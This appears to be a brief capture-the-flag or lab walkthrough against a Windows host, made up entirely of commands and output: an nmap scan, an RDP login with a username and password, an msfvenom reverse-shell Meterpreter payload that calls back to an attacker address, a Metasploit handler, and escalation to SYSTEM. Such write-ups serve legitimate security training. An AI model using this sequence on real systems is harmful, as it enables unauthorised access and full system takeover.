# ── Recon ────────────────────────────────────
└─# nmap -sV -sC 10.10.X.X
80/tcp open http Microsoft IIS 10.0
3389/tcp open ms-wbt-server (RDP)
# ── RDP Access ───────────────────────────────
└─# xfreerdp /u:Wade /p:parzival /v:10.10.X.X
[INFO] Connected to 10.10.X.X — Welcome, Wade!
# ── msfvenom Payload ─────────────────────────
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.X.X.X LPORT=4444 -f exe > shell.exe
Generated payload: shell.exe (73802 bytes)
# ── Metasploit Handler ───────────────────────
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.X.X.X → run
[*] Meterpreter session 1 opened
meterpreter > getsystem
...got system via technique 1 (Named Pipe)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
└─#